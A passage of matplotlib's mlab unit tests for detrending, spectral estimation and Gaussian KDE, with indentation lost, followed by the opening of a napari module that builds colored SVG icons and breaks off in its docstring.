with pytest.raises(ValueError):
mlab.detrend_mean(input, axis=0)
def test_detrend_0D_d0_ValueError(self):
input = 5.5
with pytest.raises(ValueError):
mlab.detrend(input, axis=0)
def test_detrend_mean_1D_d1_ValueError(self):
input = self.sig_slope
with pytest.raises(ValueError):
mlab.detrend_mean(input, axis=1)
def test_detrend_1D_d1_ValueError(self):
input = self.sig_slope
with pytest.raises(ValueError):
mlab.detrend(input, axis=1)
def test_detrend_mean_2D_d2_ValueError(self):
input = self.sig_slope[np.newaxis]
with pytest.raises(ValueError):
mlab.detrend_mean(input, axis=2)
def test_detrend_2D_d2_ValueError(self):
input = self.sig_slope[np.newaxis]
with pytest.raises(ValueError):
mlab.detrend(input, axis=2)
def test_detrend_linear_0D_zeros(self):
input = 0.
targ = 0.
res = mlab.detrend_linear(input)
assert_almost_equal(res, targ)
def test_detrend_linear_0D_off(self):
input = 5.5
targ = 0.
res = mlab.detrend_linear(input)
assert_almost_equal(res, targ)
def test_detrend_str_linear_0D_off(self):
input = 5.5
targ = 0.
res = mlab.detrend(input, key='linear')
assert_almost_equal(res, targ)
def test_detrend_detrend_linear_0D_off(self):
input = 5.5
targ = 0.
res = mlab.detrend(input, key=mlab.detrend_linear)
assert_almost_equal(res, targ)
def test_detrend_linear_1d_off(self):
input = self.sig_off
targ = self.sig_zeros
res = mlab.detrend_linear(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_linear_1d_slope(self):
input = self.sig_slope
targ = self.sig_zeros
res = mlab.detrend_linear(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_linear_1d_slope_off(self):
input = self.sig_slope + self.sig_off
targ = self.sig_zeros
res = mlab.detrend_linear(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_str_linear_1d_slope_off(self):
input = self.sig_slope + self.sig_off
targ = self.sig_zeros
res = mlab.detrend(input, key='linear')
assert_allclose(res, targ, atol=self.atol)
def test_detrend_detrend_linear_1d_slope_off(self):
input = self.sig_slope + self.sig_off
targ = self.sig_zeros
res = mlab.detrend(input, key=mlab.detrend_linear)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_linear_1d_slope_off_list(self):
input = self.sig_slope + self.sig_off
targ = self.sig_zeros
res = mlab.detrend_linear(input.tolist())
assert_allclose(res, targ, atol=self.atol)
def test_detrend_linear_2D_ValueError(self):
input = self.sig_slope[np.newaxis]
with pytest.raises(ValueError):
mlab.detrend_linear(input)
def test_detrend_str_linear_2d_slope_off_axis0(self):
arri = [self.sig_off,
self.sig_slope,
self.sig_slope + self.sig_off]
arrt = [self.sig_zeros,
self.sig_zeros,
self.sig_zeros]
input = np.vstack(arri).T
targ = np.vstack(arrt).T
res = mlab.detrend(input, key='linear', axis=0)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_detrend_linear_1d_slope_off_axis1(self):
arri = [self.sig_off,
self.sig_slope,
self.sig_slope + self.sig_off]
arrt = [self.sig_zeros,
self.sig_zeros,
self.sig_zeros]
input = np.vstack(arri).T
targ = np.vstack(arrt).T
res = mlab.detrend(input, key=mlab.detrend_linear, axis=0)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_str_linear_2d_slope_off_axis0_notranspose(self):
arri = [self.sig_off,
self.sig_slope,
self.sig_slope + self.sig_off]
arrt = [self.sig_zeros,
self.sig_zeros,
self.sig_zeros]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend(input, key='linear', axis=1)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_detrend_linear_1d_slope_off_axis1_notranspose(self):
arri = [self.sig_off,
self.sig_slope,
self.sig_slope + self.sig_off]
arrt = [self.sig_zeros,
self.sig_zeros,
self.sig_zeros]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend(input, key=mlab.detrend_linear, axis=1)
assert_allclose(res, targ, atol=self.atol)
@pytest.mark.parametrize('iscomplex', [False, True],
ids=['real', 'complex'], scope='class')
@pytest.mark.parametrize('sides', ['onesided', 'twosided', 'default'],
scope='class')
@pytest.mark.parametrize(
'fstims,len_x,NFFT_density,nover_density,pad_to_density,pad_to_spectrum',
[
([], None, -1, -1, -1, -1),
([4], None, -1, -1, -1, -1),
([4, 5, 10], None, -1, -1, -1, -1),
([], None, None, -1, -1, None),
([], None, -1, -1, None, None),
([], None, None, -1, None, None),
([], 1024, 512, -1, -1, 128),
([], 256, -1, -1, 33, 257),
([], 255, 33, -1, -1, None),
([], 256, 128, -1, 256, 256),
([], None, -1, 32, -1, -1),
],
ids=[
'nosig',
'Fs4',
'FsAll',
'nosig_noNFFT',
'nosig_nopad_to',
'nosig_noNFFT_no_pad_to',
'nosig_trim',
'nosig_odd',
'nosig_oddlen',
'nosig_stretch',
'nosig_overlap',
],
scope='class')
class TestSpectral:
@pytest.fixture(scope='class', autouse=True)
def stim(self, request, fstims, iscomplex, sides, len_x, NFFT_density,
nover_density, pad_to_density, pad_to_spectrum):
Fs = 100.
x = np.arange(0, 10, 1 / Fs)
if len_x is not None:
x = x[:len_x]
# get the stimulus frequencies, defaulting to None
fstims = [Fs / fstim for fstim in fstims]
# get the constants, default to calculated values
if NFFT_density is None:
NFFT_density_real = 256
elif NFFT_density < 0:
NFFT_density_real = NFFT_density = 100
else:
NFFT_density_real = NFFT_density
if nover_density is None:
nover_density_real = 0
elif nover_density < 0:
nover_density_real = nover_density = NFFT_density_real // 2
else:
nover_density_real = nover_density
if pad_to_density is None:
pad_to_density_real = NFFT_density_real
elif pad_to_density < 0:
pad_to_density = int(2**np.ceil(np.log2(NFFT_density_real)))
pad_to_density_real = pad_to_density
else:
pad_to_density_real = pad_to_density
if pad_to_spectrum is None:
pad_to_spectrum_real = len(x)
elif pad_to_spectrum < 0:
pad_to_spectrum_real = pad_to_spectrum = len(x)
else:
pad_to_spectrum_real = pad_to_spectrum
if pad_to_spectrum is None:
NFFT_spectrum_real = NFFT_spectrum = pad_to_spectrum_real
else:
NFFT_spectrum_real = NFFT_spectrum = len(x)
nover_spectrum = 0
NFFT_specgram = NFFT_density
nover_specgram = nover_density
pad_to_specgram = pad_to_density
NFFT_specgram_real = NFFT_density_real
nover_specgram_real = nover_density_real
if sides == 'onesided' or (sides == 'default' and not iscomplex):
# frequencies for specgram, psd, and csd
# need to handle even and odd differently
if pad_to_density_real % 2:
freqs_density = np.linspace(0, Fs / 2,
num=pad_to_density_real,
endpoint=False)[::2]
else:
freqs_density = np.linspace(0, Fs / 2,
num=pad_to_density_real // 2 + 1)
# frequencies for complex, magnitude, angle, and phase spectrums
# need to handle even and odd differently
if pad_to_spectrum_real % 2:
freqs_spectrum = np.linspace(0, Fs / 2,
num=pad_to_spectrum_real,
endpoint=False)[::2]
else:
freqs_spectrum = np.linspace(0, Fs / 2,
num=pad_to_spectrum_real // 2 + 1)
else:
# frequencies for specgram, psd, and csd
# need to handle even and odd differentl
if pad_to_density_real % 2:
freqs_density = np.linspace(-Fs / 2, Fs / 2,
num=2 * pad_to_density_real,
endpoint=False)[1::2]
else:
freqs_density = np.linspace(-Fs / 2, Fs / 2,
num=pad_to_density_real,
endpoint=False)
# frequencies for complex, magnitude, angle, and phase spectrums
# need to handle even and odd differently
if pad_to_spectrum_real % 2:
freqs_spectrum = np.linspace(-Fs / 2, Fs / 2,
num=2 * pad_to_spectrum_real,
endpoint=False)[1::2]
else:
freqs_spectrum = np.linspace(-Fs / 2, Fs / 2,
num=pad_to_spectrum_real,
endpoint=False)
freqs_specgram = freqs_density
# time points for specgram
t_start = NFFT_specgram_real // 2
t_stop = len(x) - NFFT_specgram_real // 2 + 1
t_step = NFFT_specgram_real - nover_specgram_real
t_specgram = x[t_start:t_stop:t_step]
if NFFT_specgram_real % 2:
t_specgram += 1 / Fs / 2
if len(t_specgram) == 0:
t_specgram = np.array([NFFT_specgram_real / (2 * Fs)])
t_spectrum = np.array([NFFT_spectrum_real / (2 * Fs)])
t_density = t_specgram
y = np.zeros_like(x)
for i, fstim in enumerate(fstims):
y += np.sin(fstim * x * np.pi * 2) * 10**i
if iscomplex:
y = y.astype('complex')
# Interestingly, the instance on which this fixture is called is not
# the same as the one on which a test is run. So we need to modify the
# class itself when using a class-scoped fixture.
cls = request.cls
cls.Fs = Fs
cls.sides = sides
cls.fstims = fstims
cls.NFFT_density = NFFT_density
cls.nover_density = nover_density
cls.pad_to_density = pad_to_density
cls.NFFT_spectrum = NFFT_spectrum
cls.nover_spectrum = nover_spectrum
cls.pad_to_spectrum = pad_to_spectrum
cls.NFFT_specgram = NFFT_specgram
cls.nover_specgram = nover_specgram
cls.pad_to_specgram = pad_to_specgram
cls.t_specgram = t_specgram
cls.t_density = t_density
cls.t_spectrum = t_spectrum
cls.y = y
cls.freqs_density = freqs_density
cls.freqs_spectrum = freqs_spectrum
cls.freqs_specgram = freqs_specgram
cls.NFFT_density_real = NFFT_density_real
def check_freqs(self, vals, targfreqs, resfreqs, fstims):
assert resfreqs.argmin() == 0
assert resfreqs.argmax() == len(resfreqs)-1
assert_allclose(resfreqs, targfreqs, atol=1e-06)
for fstim in fstims:
i = np.abs(resfreqs - fstim).argmin()
assert vals[i] > vals[i+2]
assert vals[i] > vals[i-2]
def check_maxfreq(self, spec, fsp, fstims):
# skip the test if there are no frequencies
if len(fstims) == 0:
return
# if twosided, do the test for each side
if fsp.min() < 0:
fspa = np.abs(fsp)
zeroind = fspa.argmin()
self.check_maxfreq(spec[:zeroind], fspa[:zeroind], fstims)
self.check_maxfreq(spec[zeroind:], fspa[zeroind:], fstims)
return
fstimst = fstims[:]
spect = spec.copy()
# go through each peak and make sure it is correctly the maximum peak
while fstimst:
maxind = spect.argmax()
maxfreq = fsp[maxind]
assert_almost_equal(maxfreq, fstimst[-1])
del fstimst[-1]
spect[maxind-5:maxind+5] = 0
def test_spectral_helper_raises(self):
# We don't use parametrize here to handle ``y = self.y``.
for kwargs in [ # Various error conditions:
{"y": self.y+1, "mode": "complex"}, # Modes requiring ``x is y``.
{"y": self.y+1, "mode": "magnitude"},
{"y": self.y+1, "mode": "angle"},
{"y": self.y+1, "mode": "phase"},
{"mode": "spam"}, # Bad mode.
{"y": self.y, "sides": "eggs"}, # Bad sides.
{"y": self.y, "NFFT": 10, "noverlap": 20}, # noverlap > NFFT.
{"NFFT": 10, "noverlap": 10}, # noverlap == NFFT.
{"y": self.y, "NFFT": 10,
"window": np.ones(9)}, # len(win) != NFFT.
]:
with pytest.raises(ValueError):
mlab._spectral_helper(x=self.y, **kwargs)
@pytest.mark.parametrize('mode', ['default', 'psd'])
def test_single_spectrum_helper_unsupported_modes(self, mode):
with pytest.raises(ValueError):
mlab._single_spectrum_helper(x=self.y, mode=mode)
@pytest.mark.parametrize("mode, case", [
("psd", "density"),
("magnitude", "specgram"),
("magnitude", "spectrum"),
])
def test_spectral_helper_psd(self, mode, case):
freqs = getattr(self, f"freqs_{case}")
spec, fsp, t = mlab._spectral_helper(
x=self.y, y=self.y,
NFFT=getattr(self, f"NFFT_{case}"),
Fs=self.Fs,
noverlap=getattr(self, f"nover_{case}"),
pad_to=getattr(self, f"pad_to_{case}"),
sides=self.sides,
mode=mode)
assert_allclose(fsp, freqs, atol=1e-06)
assert_allclose(t, getattr(self, f"t_{case}"), atol=1e-06)
assert spec.shape[0] == freqs.shape[0]
assert spec.shape[1] == getattr(self, f"t_{case}").shape[0]
def test_csd(self):
freqs = self.freqs_density
spec, fsp = mlab.csd(x=self.y, y=self.y+1,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides)
assert_allclose(fsp, freqs, atol=1e-06)
assert spec.shape == freqs.shape
def test_csd_padding(self):
"""Test zero padding of csd()."""
if self.NFFT_density is None: # for derived classes
return
sargs = dict(x=self.y, y=self.y+1, Fs=self.Fs, window=mlab.window_none,
sides=self.sides)
spec0, _ = mlab.csd(NFFT=self.NFFT_density, **sargs)
spec1, _ = mlab.csd(NFFT=self.NFFT_density*2, **sargs)
assert_almost_equal(np.sum(np.conjugate(spec0)*spec0).real,
np.sum(np.conjugate(spec1/2)*spec1/2).real)
def test_psd(self):
freqs = self.freqs_density
spec, fsp = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides)
assert spec.shape == freqs.shape
self.check_freqs(spec, freqs, fsp, self.fstims)
@pytest.mark.parametrize(
'make_data, detrend',
[(np.zeros, mlab.detrend_mean), (np.zeros, 'mean'),
(np.arange, mlab.detrend_linear), (np.arange, 'linear')])
def test_psd_detrend(self, make_data, detrend):
if self.NFFT_density is None:
return
ydata = make_data(self.NFFT_density)
ydata1 = ydata+5
ydata2 = ydata+3.3
ydata = np.vstack([ydata1, ydata2])
ydata = np.tile(ydata, (20, 1))
ydatab = ydata.T.flatten()
ydata = ydata.flatten()
ycontrol = np.zeros_like(ydata)
spec_g, fsp_g = mlab.psd(x=ydata,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
detrend=detrend)
spec_b, fsp_b = mlab.psd(x=ydatab,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
detrend=detrend)
spec_c, fsp_c = mlab.psd(x=ycontrol,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides)
assert_array_equal(fsp_g, fsp_c)
assert_array_equal(fsp_b, fsp_c)
assert_allclose(spec_g, spec_c, atol=1e-08)
# these should not be almost equal
with pytest.raises(AssertionError):
assert_allclose(spec_b, spec_c, atol=1e-08)
def test_psd_window_hanning(self):
if self.NFFT_density is None:
return
ydata = np.arange(self.NFFT_density)
ydata1 = ydata+5
ydata2 = ydata+3.3
ycontrol1, windowVals = _apply_window(ydata1,
mlab.window_hanning,
return_window=True)
ycontrol2 = mlab.window_hanning(ydata2)
ydata = np.vstack([ydata1, ydata2])
ycontrol = np.vstack([ycontrol1, ycontrol2])
ydata = np.tile(ydata, (20, 1))
ycontrol = np.tile(ycontrol, (20, 1))
ydatab = ydata.T.flatten()
ydataf = ydata.flatten()
ycontrol = ycontrol.flatten()
spec_g, fsp_g = mlab.psd(x=ydataf,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
window=mlab.window_hanning)
spec_b, fsp_b = mlab.psd(x=ydatab,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
window=mlab.window_hanning)
spec_c, fsp_c = mlab.psd(x=ycontrol,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
window=mlab.window_none)
spec_c *= len(ycontrol1)/(np.abs(windowVals)**2).sum()
assert_array_equal(fsp_g, fsp_c)
assert_array_equal(fsp_b, fsp_c)
assert_allclose(spec_g, spec_c, atol=1e-08)
# these should not be almost equal
with pytest.raises(AssertionError):
assert_allclose(spec_b, spec_c, atol=1e-08)
def test_psd_window_hanning_detrend_linear(self):
if self.NFFT_density is None:
return
ydata = np.arange(self.NFFT_density)
ycontrol = np.zeros(self.NFFT_density)
ydata1 = ydata+5
ydata2 = ydata+3.3
ycontrol1 = ycontrol
ycontrol2 = ycontrol
ycontrol1, windowVals = _apply_window(ycontrol1,
mlab.window_hanning,
return_window=True)
ycontrol2 = mlab.window_hanning(ycontrol2)
ydata = np.vstack([ydata1, ydata2])
ycontrol = np.vstack([ycontrol1, ycontrol2])
ydata = np.tile(ydata, (20, 1))
ycontrol = np.tile(ycontrol, (20, 1))
ydatab = ydata.T.flatten()
ydataf = ydata.flatten()
ycontrol = ycontrol.flatten()
spec_g, fsp_g = mlab.psd(x=ydataf,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
detrend=mlab.detrend_linear,
window=mlab.window_hanning)
spec_b, fsp_b = mlab.psd(x=ydatab,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
detrend=mlab.detrend_linear,
window=mlab.window_hanning)
spec_c, fsp_c = mlab.psd(x=ycontrol,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
window=mlab.window_none)
spec_c *= len(ycontrol1)/(np.abs(windowVals)**2).sum()
assert_array_equal(fsp_g, fsp_c)
assert_array_equal(fsp_b, fsp_c)
assert_allclose(spec_g, spec_c, atol=1e-08)
# these should not be almost equal
with pytest.raises(AssertionError):
assert_allclose(spec_b, spec_c, atol=1e-08)
def test_psd_windowarray(self):
freqs = self.freqs_density
spec, fsp = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides,
window=np.ones(self.NFFT_density_real))
assert_allclose(fsp, freqs, atol=1e-06)
assert spec.shape == freqs.shape
def test_psd_windowarray_scale_by_freq(self):
win = mlab.window_hanning(np.ones(self.NFFT_density_real))
spec, fsp = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides,
window=mlab.window_hanning)
spec_s, fsp_s = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides,
window=mlab.window_hanning,
scale_by_freq=True)
spec_n, fsp_n = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides,
window=mlab.window_hanning,
scale_by_freq=False)
assert_array_equal(fsp, fsp_s)
assert_array_equal(fsp, fsp_n)
assert_array_equal(spec, spec_s)
assert_allclose(spec_s*(win**2).sum(),
spec_n/self.Fs*win.sum()**2,
atol=1e-08)
@pytest.mark.parametrize(
"kind", ["complex", "magnitude", "angle", "phase"])
def test_spectrum(self, kind):
freqs = self.freqs_spectrum
spec, fsp = getattr(mlab, f"{kind}_spectrum")(
x=self.y,
Fs=self.Fs, sides=self.sides, pad_to=self.pad_to_spectrum)
assert_allclose(fsp, freqs, atol=1e-06)
assert spec.shape == freqs.shape
if kind == "magnitude":
self.check_maxfreq(spec, fsp, self.fstims)
self.check_freqs(spec, freqs, fsp, self.fstims)
@pytest.mark.parametrize(
'kwargs',
[{}, {'mode': 'default'}, {'mode': 'psd'}, {'mode': 'magnitude'},
{'mode': 'complex'}, {'mode': 'angle'}, {'mode': 'phase'}])
def test_specgram(self, kwargs):
freqs = self.freqs_specgram
spec, fsp, t = mlab.specgram(x=self.y,
NFFT=self.NFFT_specgram,
Fs=self.Fs,
noverlap=self.nover_specgram,
pad_to=self.pad_to_specgram,
sides=self.sides,
**kwargs)
if kwargs.get('mode') == 'complex':
spec = np.abs(spec)
specm = np.mean(spec, axis=1)
assert_allclose(fsp, freqs, atol=1e-06)
assert_allclose(t, self.t_specgram, atol=1e-06)
assert spec.shape[0] == freqs.shape[0]
assert spec.shape[1] == self.t_specgram.shape[0]
if kwargs.get('mode') not in ['complex', 'angle', 'phase']:
# using a single freq, so all time slices should be about the same
if np.abs(spec.max()) != 0:
assert_allclose(
np.diff(spec, axis=1).max() / np.abs(spec.max()), 0,
atol=1e-02)
if kwargs.get('mode') not in ['angle', 'phase']:
self.check_freqs(specm, freqs, fsp, self.fstims)
def test_specgram_warn_only1seg(self):
"""Warning should be raised if len(x) <= NFFT."""
with pytest.warns(UserWarning, match="Only one segment is calculated"):
mlab.specgram(x=self.y, NFFT=len(self.y), Fs=self.Fs)
def test_psd_csd_equal(self):
Pxx, freqsxx = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides)
Pxy, freqsxy = mlab.csd(x=self.y, y=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides)
assert_array_almost_equal_nulp(Pxx, Pxy)
assert_array_equal(freqsxx, freqsxy)
@pytest.mark.parametrize("mode", ["default", "psd"])
def test_specgram_auto_default_psd_equal(self, mode):
"""
Test that mlab.specgram without mode and with mode 'default' and 'psd'
are all the same.
"""
speca, freqspeca, ta = mlab.specgram(x=self.y,
NFFT=self.NFFT_specgram,
Fs=self.Fs,
noverlap=self.nover_specgram,
pad_to=self.pad_to_specgram,
sides=self.sides)
specb, freqspecb, tb = mlab.specgram(x=self.y,
NFFT=self.NFFT_specgram,
Fs=self.Fs,
noverlap=self.nover_specgram,
pad_to=self.pad_to_specgram,
sides=self.sides,
mode=mode)
assert_array_equal(speca, specb)
assert_array_equal(freqspeca, freqspecb)
assert_array_equal(ta, tb)
@pytest.mark.parametrize(
"mode, conv", [
("magnitude", np.abs),
("angle", np.angle),
("phase", lambda x: np.unwrap(np.angle(x), axis=0))
])
def test_specgram_complex_equivalent(self, mode, conv):
specc, freqspecc, tc = mlab.specgram(x=self.y,
NFFT=self.NFFT_specgram,
Fs=self.Fs,
noverlap=self.nover_specgram,
pad_to=self.pad_to_specgram,
sides=self.sides,
mode='complex')
specm, freqspecm, tm = mlab.specgram(x=self.y,
NFFT=self.NFFT_specgram,
Fs=self.Fs,
noverlap=self.nover_specgram,
pad_to=self.pad_to_specgram,
sides=self.sides,
mode=mode)
assert_array_equal(freqspecc, freqspecm)
assert_array_equal(tc, tm)
assert_allclose(conv(specc), specm, atol=1e-06)
def test_psd_windowarray_equal(self):
win = mlab.window_hanning(np.ones(self.NFFT_density_real))
speca, fspa = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides,
window=win)
specb, fspb = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides)
assert_array_equal(fspa, fspb)
assert_allclose(speca, specb, atol=1e-08)
# extra test for cohere...
def test_cohere():
N = 1024
np.random.seed(19680801)
x = np.random.randn(N)
# phase offset
y = np.roll(x, 20)
# high-freq roll-off
y = np.convolve(y, np.ones(20) / 20., mode='same')
cohsq, f = mlab.cohere(x, y, NFFT=256, Fs=2, noverlap=128)
assert_allclose(np.mean(cohsq), 0.837, atol=1.e-3)
assert np.isreal(np.mean(cohsq))
#*****************************************************************
# These Tests where taken from SCIPY with some minor modifications
# this can be retrieved from:
# https://github.com/scipy/scipy/blob/master/scipy/stats/tests/test_kdeoth.py
#*****************************************************************
class TestGaussianKDE:
def test_kde_integer_input(self):
"""Regression test for #1181."""
x1 = np.arange(5)
kde = mlab.GaussianKDE(x1)
y_expected = [0.13480721, 0.18222869, 0.19514935, 0.18222869,
0.13480721]
np.testing.assert_array_almost_equal(kde(x1), y_expected, decimal=6)
def test_gaussian_kde_covariance_caching(self):
x1 = np.array([-7, -5, 1, 4, 5], dtype=float)
xs = np.linspace(-10, 10, num=5)
# These expected values are from scipy 0.10, before some changes to
# gaussian_kde. They were not compared with any external reference.
y_expected = [0.02463386, 0.04689208, 0.05395444, 0.05337754,
0.01664475]
# set it to the default bandwidth.
kde2 = mlab.GaussianKDE(x1, 'scott')
y2 = kde2(xs)
np.testing.assert_array_almost_equal(y_expected, y2, decimal=7)
def test_kde_bandwidth_method(self):
np.random.seed(8765678)
n_basesample = 50
xn = np.random.randn(n_basesample)
# Default
gkde = mlab.GaussianKDE(xn)
# Supply a callable
gkde2 = mlab.GaussianKDE(xn, 'scott')
# Supply a scalar
gkde3 = mlab.GaussianKDE(xn, bw_method=gkde.factor)
xs = np.linspace(-7, 7, 51)
kdepdf = gkde.evaluate(xs)
kdepdf2 = gkde2.evaluate(xs)
assert kdepdf.all() == kdepdf2.all()
kdepdf3 = gkde3.evaluate(xs)
assert kdepdf.all() == kdepdf3.all()
class TestGaussianKDECustom:
def test_no_data(self):
"""Pass no data into the GaussianKDE class."""
with pytest.raises(ValueError):
mlab.GaussianKDE([])
def test_single_dataset_element(self):
"""Pass a single dataset element into the GaussianKDE class."""
with pytest.raises(ValueError):
mlab.GaussianKDE([42])
def test_silverman_multidim_dataset(self):
"""Test silverman's for a multi-dimensional array."""
x1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
with pytest.raises(np.linalg.LinAlgError):
mlab.GaussianKDE(x1, "silverman")
def test_silverman_singledim_dataset(self):
"""Test silverman's output for a single dimension list."""
x1 = np.array([-7, -5, 1, 4, 5])
mygauss = mlab.GaussianKDE(x1, "silverman")
y_expected = 0.76770389927475502
assert_almost_equal(mygauss.covariance_factor(), y_expected, 7)
def test_scott_multidim_dataset(self):
"""Test scott's output for a multi-dimensional array."""
x1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
with pytest.raises(np.linalg.LinAlgError):
mlab.GaussianKDE(x1, "scott")
def test_scott_singledim_dataset(self):
"""Test scott's output a single-dimensional array."""
x1 = np.array([-7, -5, 1, 4, 5])
mygauss = mlab.GaussianKDE(x1, "scott")
y_expected = 0.72477966367769553
assert_almost_equal(mygauss.covariance_factor(), y_expected, 7)
def test_scalar_empty_dataset(self):
"""Test the scalar's cov factor for an empty array."""
with pytest.raises(ValueError):
mlab.GaussianKDE([], bw_method=5)
def test_scalar_covariance_dataset(self):
"""Test a scalar's cov factor."""
np.random.seed(8765678)
n_basesample = 50
multidim_data = [np.random.randn(n_basesample) for i in range(5)]
kde = mlab.GaussianKDE(multidim_data, bw_method=0.5)
assert kde.covariance_factor() == 0.5
def test_callable_covariance_dataset(self):
"""Test the callable's cov factor for a multi-dimensional array."""
np.random.seed(8765678)
n_basesample = 50
multidim_data = [np.random.randn(n_basesample) for i in range(5)]
def callable_fun(x):
return 0.55
kde = mlab.GaussianKDE(multidim_data, bw_method=callable_fun)
assert kde.covariance_factor() == 0.55
def test_callable_singledim_dataset(self):
"""Test the callable's cov factor for a single-dimensional array."""
np.random.seed(8765678)
n_basesample = 50
multidim_data = np.random.randn(n_basesample)
kde = mlab.GaussianKDE(multidim_data, bw_method='silverman')
y_expected = 0.48438841363348911
assert_almost_equal(kde.covariance_factor(), y_expected, 7)
def test_wrong_bw_method(self):
"""Test the error message that should be called when bw is invalid."""
np.random.seed(8765678)
n_basesample = 50
data = np.random.randn(n_basesample)
with pytest.raises(ValueError):
mlab.GaussianKDE(data, bw_method="invalid")
class TestGaussianKDEEvaluate:
def test_evaluate_diff_dim(self):
"""
Test the evaluate method when the dim's of dataset and points have
different dimensions.
"""
x1 = np.arange(3, 10, 2)
kde = mlab.GaussianKDE(x1)
x2 = np.arange(3, 12, 2)
y_expected = [
0.08797252, 0.11774109, 0.11774109, 0.08797252, 0.0370153
]
y = kde.evaluate(x2)
np.testing.assert_array_almost_equal(y, y_expected, 7)
def test_evaluate_inv_dim(self):
"""
Invert the dimensions; i.e., for a dataset of dimension 1 [3, 2, 4],
the points should have a dimension of 3 [[3], [2], [4]].
"""
np.random.seed(8765678)
n_basesample = 50
multidim_data = np.random.randn(n_basesample)
kde = mlab.GaussianKDE(multidim_data)
x2 = [[1], [2], [3]]
with pytest.raises(ValueError):
kde.evaluate(x2)
def test_evaluate_dim_and_num(self):
"""Tests if evaluated against a one by one array"""
x1 = np.arange(3, 10, 2)
x2 = np.array([3])
kde = mlab.GaussianKDE(x1)
y_expected = [0.08797252]
y = kde.evaluate(x2)
np.testing.assert_array_almost_equal(y, y_expected, 7)
def test_evaluate_point_dim_not_one(self):
x1 = np.arange(3, 10, 2)
x2 = [np.arange(3, 10, 2), np.arange(3, 10, 2)]
kde = mlab.GaussianKDE(x1)
with pytest.raises(ValueError):
kde.evaluate(x2)
def test_evaluate_equal_dim_and_num_lt(self):
x1 = np.arange(3, 10, 2)
x2 = np.arange(3, 8, 2)
kde = mlab.GaussianKDE(x1)
y_expected = [0.08797252, 0.11774109, 0.11774109]
y = kde.evaluate(x2)
np.testing.assert_array_almost_equal(y, y_expected, 7)
def test_psd_onesided_norm():
u = np.array([0, 1, 2, 3, 1, 2, 1])
dt = 1.0
Su = np.abs(np.fft.fft(u) * dt)**2 / (dt * u.size)
P, f = mlab.psd(u, NFFT=u.size, Fs=1/dt, window=mlab.window_none,
detrend=mlab.detrend_none, noverlap=0, pad_to=None,
scale_by_freq=None,
sides='onesided')
Su_1side = np.append([Su[0]], Su[1:4] + Su[4:][::-1])
assert_allclose(P, Su_1side, atol=1e-06)
def test_psd_oversampling():
"""Test the case len(x) < NFFT for psd()."""
u = np.array([0, 1, 2, 3, 1, 2, 1])
dt = 1.0
Su = np.abs(np.fft.fft(u) * dt)**2 / (dt * u.size)
P, f = mlab.psd(u, NFFT=u.size*2, Fs=1/dt, window=mlab.window_none,
detrend=mlab.detrend_none, noverlap=0, pad_to=None,
scale_by_freq=None,
sides='onesided')
Su_1side = np.append([Su[0]], Su[1:4] + Su[4:][::-1])
assert_almost_equal(np.sum(P), np.sum(Su_1side)) # same energy
|
napari/_qt/qt_resources/_svg.py
|
MaksHess/napari
| 1,345 |
129552
|
"""
A Class for generating QIcons from SVGs with arbitrary colors at runtime.
"""
from functools import lru_cache
from typing import Optional, Union
from qtpy.QtCore import QByteArray, QPoint, QRect, QRectF, Qt
from qtpy.QtGui import QIcon, QIconEngine, QImage, QPainter, QPixmap
from qtpy.QtSvg import QSvgRenderer
class QColoredSVGIcon(QIcon):
"""A QIcon class that specializes in colorizing SVG files.
Parameters
----------
path_or_xml : str
Raw SVG XML or a path to an existing svg file. (Will raise error on
``__init__`` if a non-existent file is provided.)
color : str, optional
A valid CSS color string, used to colorize the SVG. by default None.
opacity : float, optional
Fill opacity for the icon (0-1). By default 1 (opaque).
Examples
--------
>>> from napari._qt.qt_resources import QColoredSVGIcon
>>> from qtpy.QtWidgets import QLabel
# Create icon with specific color
>>> label = QLabel()
>>> icon = QColoredSVGIcon.from_resources('new_points')
